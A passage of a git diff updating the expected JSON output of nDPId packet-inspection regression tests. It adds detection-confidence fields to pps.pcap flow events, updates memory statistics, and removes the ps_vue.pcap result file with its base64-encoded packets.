+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7440000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7440000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353197131,"flow_last_seen":1467353203157,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1161,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353197131,"flow_last_seen":1467353203157,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1161,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1467353136432,"flow_last_seen":1467353136981,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":148446,"flow_avg_l4_payload_len":371,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"1.173.5.226","dst_ip":"192.168.115.8","src_port":22636,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","total-events-serialized":564}
+00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","total-events-serialized":565}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2557/2557
 ~~ skipped flows.............: 0
@@ -570,9 +571,9 @@
 ~~ total active/idle flows...: 107/107
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4858924 bytes
-~~ total memory freed........: 4858924 bytes
-~~ total allocations/frees...: 102634/102634
+~~ total memory allocated....: 4897685 bytes
+~~ total memory freed........: 4897685 bytes
+~~ total allocations/frees...: 104224/104224
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 2175 chars
diff --git a/test/results/ps_vue.pcap.out b/test/results/ps_vue.pcap.out
deleted file mode 100644
index bc75a341b..000000000
--- a/test/results/ps_vue.pcap.out
+++ /dev/null
@@ -1,60 +0,0 @@
-00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ps_vue.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831054386,"flow_last_seen":1568831054386,"flow_idle_time":7440000,"flow_min_l4_payload_len":1318,"flow_max_l4_payload_len":1318,"flow_tot_l4_payload_len":1318,"flow_avg_l4_payload_len":1318,"midstream":1,"ts_msec":1568831054386,"l3_proto":"ip4","src_ip":"8.252.2.139","dst_ip":"192.168.1.132","src_port":80,"dst_port":59198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1568831054386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1372,"pkt_l4_len":1338,"ts_msec":1568831054386,"pkt":"QJkivOG5AKC8brI7CABFaAVOJd8AADQGjbAI\/AKLwKgBhABQ5z6u3wY0Ay5J4VAQgjL2BgAAKErv4VCv5XHq3VugakpTkhrL+kb9dEp7ZqV8OhbiblbF4ucSVzx\/MP1oilcz0crd02QqcE8+devTItKmafCbWnAwE\/9DOgi7ce43g2BD\/nJGwrypV0n\/lpKlZCPvunYTTeqjhwGKc6502l87Xs+zfJVWBneqtMKdkFu9Luvy+dyqO7rHnCabtAWrpEy0TRcv6LTWKIFUotAIaLkmY7WgSmFIZ62TK8CnvaxwDwzYvJ5ZjQiFN8X5DxilG\/df4sIjuAdwJhNDFhHUfzAE+UueG\/lVfoML5Xk9w+TPsk3F5uGAaPkC86EBn82kkWRI6MGF8SyydVvt5HnewuoCF8DHruY5qPlbl5yLGmUCy6LuKc8s6KM27nygc3Bte7e7XAKflW8Wcvmd0+7YASMoWJ\/SESHwJfo+tjoKQJDCuUg0eYkktG8s\/htBFaRrrEIIIogo1I1rceufguXuUufTPlgB4e4clivmC\/NVWuNR4Wlwc23B3RImV9O2fDK8pRwdsflldfN+2wrlemyOmIEW44MXIVRj4Jx0AiJHgrkz1UzanBUfeGRbpCbnANXha\/D+RxGqI9Y56kLfgbJA9toJuDdEp381WrPm4dk\/35T1ydquleaKrCQ4GUMJvemfq4+2BDWl9ZtzetW\/B52p73A\/IWp9\/JZFCoDaxRJxW2x+nAmeXg4dqTNcnSkj6r0ZKGpEmQibRROebc4N\/OonXc34WkAxZUnA1lC9DEfcItjHPS5bD37cnbpH0gQpDyjOpktkp2UlMdh3PUqigdjHcpUokGd4mAs+\/YFOJPQYT3L5Unc7NDJXghAQbx2nr+oAPx57SB2pRpLcQeD0J57sEpedBQn4XuPnJzaT3OIKdVjZBmwQsn6OHZjEK0I+7BC1eT+jxrPCCQKfpdarqx0mvDgQYWl9uo48EyOvlFkhXjzwZ\/g0nNk9VvOJk9J0L3HSGeXT5\/gmBR6HQc0jiTIlo7hsvOPQ3KzYvH0dkO6gGhTpZwbviYuyiUwG5\/Cp\/e2WVNyZPfnGcN5Yq8w9HkqxHdyOS\/V+K2Nr+z\/t9oTBcSlldci4yuZPSv54jSSzyl3XBHOkOKXk2uUGuEDrbGYDWDjiFbdv1FyP59FHXvE3S1kPDwZrclBqLVjCjaLRSpmxaO1vC1mUHsA9VdUzyhj6QCrLBTQmgQihfCEu5hhGU+ion9NQlLrK9oTWfzfxnTcAEZ5yGWkanmygLm+9oYrRVZ1F4Jvwb0tE+fDeLs7wGIQyOmoBn+nQCxSGP5d2AHoe92SDjy1zgLy7so5DxG+8kuTVKra\/VLGpeSv2BMHOhHwp+IbvaRN9HIXUwkF9r83JbUly94XxqcakWod6a1mV\/LGqgeo3kxq1FxWfhMN8rjVKFZGzFJ6mX2\/YZXsaSJZjewY6Cu2UYcvpY\/FkSF0lYeAQdYHKmAcZsWkEdMu300Gbvn2i0tmmx+0Pfx0fG70baFTfErZgkBhLstjRnhKlAAv8h\/BrE0FKt0hIVWumNRn+jd40MiH0FOkDtxG4SoZU5omb184ogJwSJ1DwMEnXaquhJ3BQtsRwGkEeGNf7HTidpttGUz8zz4MqSXh\/sHhtofPp0atPWf22qfpEefudIXIpM5OWo9PlSNER5a99KtuZQYrTPKfXeWMWl2r\/veNAfvGyupDsDnRcFsQsCPz\/BLfBLXAKixhxb3aK2FeGHnQ0jNhJL+CcLA+EE3AEmb4MU+e4t50YO+Eu7L+xkGD57kzrugTcmBgrRjBcEA=="}
-02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1568831054386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1372,"pkt_l4_len":1338,"ts_msec":1568831054386,"pkt":"QJkivOG5AKC8brI7CABFaAVOJeAAADQGja8I\/AKLwKgBhABQ5z6u3wtaAy5J4VAQgjIehwAAVmjXm6oo5VKTUUlxb0W3E81vB9ZxFtPKR4EIgDSzsMZRuBrZPVK+DJqL7elqQHFVnXmO54z2TD4Dj28sHaJvK3ncn6xerjIN7sy9I36\/eZVwP5Cn0qrC8AIkY36VwGWTyBzL7+xIagZlNa3RdzULDJLPoM7D0T0YcEi6MyZXBujPuViaYGsfAbwbgn5b6DYRWR+vA4m5e\/vJZrAW\/bO4lnM1BJsWdGV\/8pd\/FUa\/3fjHFNsT+sPBcZz6Pr9JhudnxHr0rYuSfPsMmCecU46VRczeyiL7GPuOWst16kiLytaPfmw3b1JemKUaLWf0Rhd7tiVMf+y\/xU92Yy8WKPlolDC+\/eoXKonvA6y22W6UVrQQj\/bE6aLoNFWCbKIU5dr\/\/8\/3LL2uDEkYeNu6isLGfN0uRj3j0syq\/3uWBBmJ1HnVgrOeWkVzjv7lh7mcjbm2aVY\/UEDPaGHqh8zm9yJsZvX01bLzllIV9mMdL8yprJYLmavuYMfBWKaAN3U9UQGvKECDlN4z2HO+J4xPvhH9iLqWBk0QkGYyEvJHvbEmgGYw0eiixXhbN61PL3vQszMz94fqlK5pwlcB6VB6WX6b6uBWQe8dUh+NRho\/TQ37e5+A+Gh2Dw+2aiXdKyItQFRaQIXpZvNp5UAOLjzRBJsDz6gL+L0e0Ft\/W+qfc0TfuOzULkgJCEdw2MvcfrnjeNyRqupEjBZ7VEG\/2PUqnoLlpBKavWueOqgdsWHlTk\/70r\/COI\/Gl1\/3TznIXWoErnC6X3PL+X68zzTEJ7Hnq5x2c95lQPmzFya\/bpfdWqx4WzM8awJD5g2lvQc+eqSPoA05rpB8AcIXF9rTPSGtqGjaYy0Btc8vA7gQG8\/5Wu3iN5SY9Ao2+ToNukNfVF5IcKGIL8V+ArUNIPL9bQ9Z7Vg922vlIcv9TsMg929w5q7QEWv\/1TB6gF7LEvo\/bZQBZwabLgVwUBRYTPcY4IYiNuRlgk6wEb3fGZdMxf5Cn8MdzbzHfSl7f2ifhduyGTvWdkVFSSaJMMTDFRh3Qsazze15JppJmOciPxTmUO6Doee7Zo9IwS5y\/MEFNqTe11Hq1tQB1sV8cRFS5yPS+g4NdOqnGEYVPT0YGGGhbjvrV+h7NQE6hzPLeHiqcpcB\/4x2WRwnNJLU4NV0l7Miq8XZJdl++t2uQwMhig32aEu66660GGqxvLiNfVTxzHnAW58k8RPs5R1Xd3elrqRaZXuypABSN8g0qP8atp9wdXFmAJcctJZBbgKspLsXP7kteWGM05W4GK0LoHcsLFvSHoJ\/wNGLjta9O+jdr1rpfvwHG9SoCfh8jrG9nN0fDkh6IU+sCQTC9vES4Pu3Vth\/t2elcn0yJFisar8rl0RF3rg9qx79lgeRTQxnydxILQw446KDk\/GPez\/zajHb\/6\/pWMcrOQhb0qIFF9cJ\/FhPavhImumyOd7eg9JvHdlByzw+wVWZgjo5gi664xi0E0lvkPN0BuMXnAOfvlyGr0h\/+zwKPH8AL7teqATUH+w6vUQtF+pCPMRfDUp7eadX7iztaCTNtt6VzyVkR\/y2PkT3DZQQJ9R\/dRTOnKuedYFQQIpAyGs2fI5PDSqa2Dx8h4p6rb304eiIRR76+o0\/0pJOOaus6W4DFqvp0xHo+nK7hqgIi+XLyhUT47YdAs7H16OeAnlSXD1GmM\/0zTAkev4sFFwerrPSec73af72KjqmDVr4SSOTm5yIv28qFzzqKQ7fiETThx19Awk29yOa1w=="}
-02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1568831054386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1372,"pkt_l4_len":1338,"ts_msec":1568831054386,"pkt":"QJkivOG5AKC8brI7CABFaAVOJeEAADQGja4I\/AKLwKgBhABQ5z6u3xCAAy5J4VAQgjKcYAAApx5MJr0fxze9y0pULUQ3EpijmIO+LFmwk08ms9LFr+EIqxe5Lf9M5UhXqaso6cyoNEmrND1U3BPo21jOpkhx66xfdzjz0bSUE7eD78TLqRL5f5HB87zMKWOCKqPR0HTP8Xdlym+iZHt0xnmWSRO\/l2e7pTGF924aaAG11QsBAnAeV9a6b3DukPVuf4Beivrqpk9NPeSY4rykpa9mN3hvIx3Cdw3r5lO8kAEYBz3DOXVzXcFr52ZGORWsMHtIXnTnQT+E86kDxM70lJjOnaUsU5wDCkEYv\/snv1ajyI8obZu7r3pfhaULlIFUfojhkXhJgwTDbCNjJhiJnmvy6K1P3AsiQIZ13uNPbjM0BfEMrC8FcDmphQaB6j2tX8FV2w5uvxI2vdZFxdMWPKN4ku5UCDSVpk8WRtSfvMLOROCXTaBczRUDRDd6iQJB9liSa\/kbKb1UwHtjIuwse5162eeMS3NEqUopFEHIU4ZYwpTqV7+6TUVUaxZO6fE8Dw0x3pvh7epJITiRQ3eQyOvD0YP5IK82b67+mzxe\/6Gx\/dXHP\/V1ObFQsjd7Ihqz1NparAz3wE909sWkWBQZ\/joTBvcgvlA4lTEISOQAj01BkMXD4t0NfUhycvVPzp0DHBwYyy4sI0CCEjQI6CRYfO2KYoHsz3GqMeycgj9fjtJceX+t3IJwgxL+aXpZZi16YJ8B6xIHS2\/wBRxPpphRN7BUQPHtOzXYWooviZG5yTWj69wdIp2lA4zsQ4wXFio+RqRaR42XZABiNMQ73AZZ0tN7h81XfOUfF4pGqFXexKJlpqri\/9Iwb61HMCNKEL8mWMdvCyawLFt+keYz+REWTpqHNhr528+WUScuZ9X+j7uzG0gbDxeYvKEFP0+Yg6IMpXHpThzsFQKRz3y\/h+9fwzAQbA2Td+zAgzy22dz09vIPZ0QXf\/93Zv5y4jyiVDLZ+nNo21wv6A2byeqbLCHfMtMlZd8f32ryLofflbUcnnVQE2gJicK\/PDAMPT57VwXmcJbkvtf8K7ZcSe1TBNJznjZ2IcXRPvfZ5lU+